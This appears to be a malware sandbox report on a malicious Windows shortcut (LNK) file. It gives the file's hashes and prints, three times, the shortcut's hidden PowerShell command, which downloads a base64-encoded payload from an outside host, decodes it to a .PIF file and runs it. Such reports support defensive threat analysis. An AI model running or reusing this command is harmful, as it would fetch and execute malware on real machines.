Malicious
Infection Chain
Summary by MalvaGPT
Characteristics
Hash      Hash Value
MD5       eb7ea88f4712635b3ea3d6c625f4eda5
SHA1      e367cce6bedb5c8b9520d6fe6c2491429a2df792
SHA256    4308a4f09494d5d09cb8383c8032c665267d9c88d12c54e3a6ebbbed820df9f5
SHA384    27dc9aea417e6d6c3c3dda30b87c5a967f24fdf07c8ed36582ef5c19fa403dedba51d293df4046c563d601d072bfbdbc
SHA512    c432771da0bfb2f9f23425065ed7f07f6584357cee3eab0f74b832abcb9b48d06d610868b9fe4022abde5687186b9be74eb8cca879e2d10201c5c4ec27113db9
SSDeep    6144:f8rIj7VWxxoeCe7bizap98IfiajB+XhaOgKDwQj6nY:fyIHsxxoeCe/izaAIqSB+xaON4Y
TLSH      1314F145DB262FDEFD3906FC095F5A0988CC5C322D21D4EB9A8F128B4114AD955B392F
eb7ea88f4712635b3ea3d6c625f4eda5 (202.62 KB)
Characteristics
No malware configuration was found at this point.
Artefacts

Name: LNK: Command Execution
Verdict: Malicious
Location: eb7ea88f4712635b3ea3d6c625f4eda5
Value:
powershell.exe -WindowStyle hidden -Command (new-object System.Net.WebClient).DownloadFile('https://sgsmtp12.sgcloudhosting.com/d/venturashiprepair.com.sg/!kBspg/X8PJ861Y9Q1V','C:\\ProgramData\\HEW.GIF'); $file = 'C:\\ProgramData\\HEW.GIF'; [System.Convert]::FromBase64String((Get-Content $file)) | Set-Content C:\\ProgramData\\CHROME.PIF -Encoding Byte; start C:\\ProgramData\\CHROME.PIF;

Name: Deobfuscated PowerShell
Verdict: Malicious
Location: eb7ea88f4712635b3ea3d6c625f4eda5 > LNK CommandLine
Value:
-windowstyle "hidden" -Command (New-Object "System.Net.WebClient")."DownloadFile"("https://sgsmtp12.sgcloudhosting.com/d/venturashiprepair.com.sg/!kBspg/X8PJ861Y9Q1V", "C:\\ProgramData\\HEW.GIF") $file = "C:\\ProgramData\\HEW.GIF" [Convert]::"FromBase64String"((Get-Content $file)) | Set-Content "C:\\ProgramData\\CHROME.PIF" -Encoding "Byte" start "C:\\ProgramData\\CHROME.PIF"

Name: Deobfuscated PowerShell
Verdict: Malicious
Location: eb7ea88f4712635b3ea3d6c625f4eda5 > LNK CommandLine > [PowerShell Command]
Value:
(New-Object "System.Net.WebClient")."DownloadFile"("https://sgsmtp12.sgcloudhosting.com/d/venturashiprepair.com.sg/!kBspg/X8PJ861Y9Q1V", "C:\\ProgramData\\HEW.GIF") $file = "C:\\ProgramData\\HEW.GIF" [Convert]::"FromBase64String"((Get-Content $file)) | Set-Content "C:\\ProgramData\\CHROME.PIF" -Encoding "Byte" start "C:\\ProgramData\\CHROME.PIF"
